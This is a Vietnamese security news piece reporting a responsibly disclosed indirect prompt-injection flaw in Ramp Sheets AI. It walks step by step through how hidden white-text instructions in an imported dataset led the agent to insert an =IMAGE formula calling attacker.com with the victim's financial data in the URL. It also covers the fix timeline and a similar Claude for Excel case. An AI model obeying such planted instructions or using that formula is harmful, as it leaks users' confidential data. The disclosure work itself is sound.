Lỗ hổng bảo mật trong Ramp Sheets AI: Tấn công Prompt Injection đánh cắp dữ liệu tài chính

Ramp Sheets AI là một sản phẩm AI tác nhân (agentic AI) được thiết kế để hỗ trợ người dùng thao tác trên các bảng tính, tương tự như cách Claude hoạt động với Excel. Tuy nhiên, một lỗ hổng bảo mật mới được phát hiện đã cho phép tác nhân này chèn các công thức thực hiện yêu cầu mạng bên ngoài mà không cần sự phê duyệt của người dùng, dẫn đến nguy cơ rò rỉ dữ liệu nghiêm trọng.

Minh họa bảo mật

Vấn đề cốt lõi nằm ở kỹ thuật indirect prompt injection (prompt injection gián tiếp). PromptArmor, đội ngũ phát hiện ra lỗ hổng này, đã chỉ ra rằng một tập dữ liệu không đáng tin cậy từ bên ngoài có thể chứa các lệnh ẩn để thao túng AI của Ramp.

Chuỗi tấn công dẫn đến đánh cắp dữ liệu

Kịch bản tấn công diễn ra theo các bước tinh vi sau:

• Người dùng mở một workbook chứa mô hình tài chính mật.
• Người dùng nhập một tập dữ liệu thống kê ngành từ nguồn không tin cậy (ví dụ: trang web, email hoặc ổ chia sẻ) vào một tab riêng biệt để so sánh với dữ liệu nội bộ.
• Tập dữ liệu bên ngoài này chứa một prompt injection giấu trong văn bản màu trắng trên nền trắng (vô hình với mắt thường). Lệnh này được thiết kế để yêu cầu Ramp AI thu thập dữ liệu nhạy cảm và tạo ra một công thức độc hại.
• Khi người dùng yêu cầu Ramp AI so sánh mô hình tài chính với thống kê ngành, AI bị lừa và thực thi lệnh ẩn.
• Ramp AI tự động chèn một công thức IMAGE vào bảng tính của người dùng mà không cần sự chấp thuận. Công thức này có dạng: =IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}")
• Công thức này kích hoạt một yêu cầu mạng đến máy chủ của kẻ tấn công, gửi kèm theo dữ liệu tài chính nhạy cảm của nạn nhân thông qua tham số URL.

Minh họa kỹ thuật

Khắc phục và Thông báo trách nhiệm

Đội ngũ Threat Intelligence của PromptArmor đã tiết lộ có trách nhiệm lỗ hổng này cho Ramp. Theo đó, đội ngũ bảo mật của Ramp đã xác nhận vấn đề và khắc phục xong vào ngày 16 tháng 3 năm 2026.

Ramp đánh giá cao sự báo cáo này và cam kết duy trì tư thế bảo mật AI mạnh mẽ. Dưới đây là tóm tắt timeline của quá trình xử lý:

• 19/2/2026: PromptArmor gửi báo cáo qua email bảo mật của Ramp.
• 14/3/2026: Ramp xác nhận đã nhận báo cáo.
• 16/3/2026: Ramp thông báo vấn đề đã được giải quyết.

Bài học từ Claude for Excel

PromptArmor cũng nhận định rằng rủi ro này rất giống với vấn đề từng gặp phải trong Claude for Excel của Anthropic. Khi đó, các công thức độc hại cũng có thể kích hoạt rò rỉ dữ liệu mà người dùng không có cơ hội xem xét đầy đủ.

Anthropic đã cập nhật Claude for Excel bằng cách hiển thị một cảnh báo màu đỏ xen kẽ khi một công thức có thể gây ra lưu lượng mạng bên ngoài đang được chèn. Cảnh báo mới hiển thị toàn bộ công thức đang được chèn, giúp người dùng nhận biết rủi ro rõ ràng hơn.

Sự kiện này là lời nhắc nhở quan trọng đối với các doanh nghiệp và cá nhân sử dụng các công cụ AI tự động hóa: luôn thận trọng khi nhập dữ liệu từ các nguồn không xác định vào môi trường làm việc có sự hỗ trợ của AI.